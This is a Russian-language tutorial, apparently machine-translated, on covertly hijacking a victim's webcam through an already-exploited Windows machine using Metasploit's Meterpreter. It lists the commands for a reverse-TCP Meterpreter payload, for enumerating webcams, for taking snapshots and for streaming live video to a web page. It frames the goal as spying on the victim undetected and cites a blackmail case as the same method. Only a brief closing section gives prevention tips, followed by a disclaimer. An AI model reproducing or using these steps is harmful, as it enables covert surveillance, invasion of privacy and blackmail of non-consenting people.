В этом уроке мы рассмотрим, как мы можем взломать веб-камеру тайно и удаленно через интернет и взглянуть на то, что происходит на другой стороне. Мы используем мощный Meterpreter и Kali Linux, чтобы взломать веб-камеру жертвы. Мы возьмем под полный контроль веб-камеру, включим ее, сделаем снимки и даже будем транслировать видео в прямом эфире, чтобы никто никогда не узнал.
В начале 2014 года хакер был приговорен к 18 месяцам за то, что сделал именно это с Miss Teen USA 2013. Он нашел уязвимость в ее компьютере, сделал несколько компрометирующих фотографий с веб-камеры и шантажировал жертву. Метод, который он использовал, - это именно то, что мы испытаем здесь.
Наш лучший друг meterpreter собирается помочь нам с этим взломом. С помощью Meterpreter мы можем управлять чьей-то веб-камерой, устанавливать кейлоггер или устанавливать собственные вирусы, красть личные данные и делать практически все, что угодно на компьютере жертвы.
В этом уроке я предполагаю, что Вы уже использовали модуль атаки для использования уязвимости с помощью Metasploit. А теперь давайте перейдем к делу.
Как взломать веб-камеры?
Шаг 1:
Настройка meterpreter.
После того, как мы успешно эксплуатировали жертву, у нас теперь есть возможность установить полезную нагрузку по нашему выбору. Полезная нагрузка сообщает metasploit, что делать на компьютере жертвы, как только он взломает. Meterpreter-это наш груз. Следующая команда настраивает нашу полезную нагрузку:
set payload windows/meterpreter/reverse_tcp
Если атака прошла успешно, metasploit автоматически устанавливает meterpreter на целевую систему, и мы можем перейти к взлому веб-камеры.
Шаг 2:
Найдите веб-камеру.
Meterpreter имеет встроенный модуль для поиска и управления веб-камерой удаленной системы. Мы можем начать с поиска, если в системе вообще есть веб-камера или not.me. Для этого используется приведенная ниже команда, которая также возвращает нам название веб-камеры.
meterpreter > webcam_list
А теперь вы должны увидеть веб-камеры вашей цели, перечисленные в выходных данных.
Шаг 3:
Сделайте снимки
Если последняя команда дала нам веб камеру мы можем пойти дальше и сделать снимок:
meterpreter > webcam_snap
А теперь вы должны увидеть, что картинка была сохранена в папке /opt/framework3/msf3 просто зайдите туда
Шаг 4:Потоковое видео в реальном времени с взломанной веб-камеры
Итак, мы просто сфотографировались, давайте посмотрим, как получить прямую видеотрансляцию. Мы можем сделать это, введя следующую команду: (мы используем параметр –p, чтобы указать каталог, который мы хотим предоставить файлу потоковой передачи видео)
meterpreter > run webcam -p /var/www
Эта команда запускает веб-камеру жертвы и отправляет ее видеовыход на /var/www/webcam.htm. Вы можете открыть этот файл и посмотреть, что происходит на другом конце в прямом видеопотоке.
Как предотвратить взлом вашей собственной веб-камеры?
Существует несколько способов взлома веб-камер. В приведенном выше примере с помощью всего лишь нескольких небольших команд мы можем заглянуть в веб-камеру нашей жертвы. Любой опытный специалист по безопасности скажет вам, что ни одна система не является полностью безопасной. Вот почему вы всегда должны держать свои камеры закрытыми, когда они не используются. Лично я заклеиваю камеру как на своем ноутбуке, так и на смартфоне.
Но это не значит, что Вы не должны беспокоиться о том, чтобы об обновлении системы. Если хакер может получит контроль над вашей веб-камерой, ваша система была успешно использована, теперь она фактически является ботом, рабом злоумышленника. Это означает, что злоумышленник может сделать все, что угодно в вашей системе: получить доступ к вашим личным данным, увидеть все, что вы вводите, а также все веб-сайты, которые вы посещаете.
Какое устройство вы используете прямо сейчас? Смартфон? Ноутбук? Скорее всего, вы смотрите прямо в камеру. Вы вдруг почувствовали себя немного неловко? Вы должны. Не принимайте никаких шансов. Если вы просто закрываете свои камеры и регулярно обновляете все свое программное обеспечение, вы можете избежать того, чтобы стать жертвой взлома веб-камеры самостоятельно.
Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.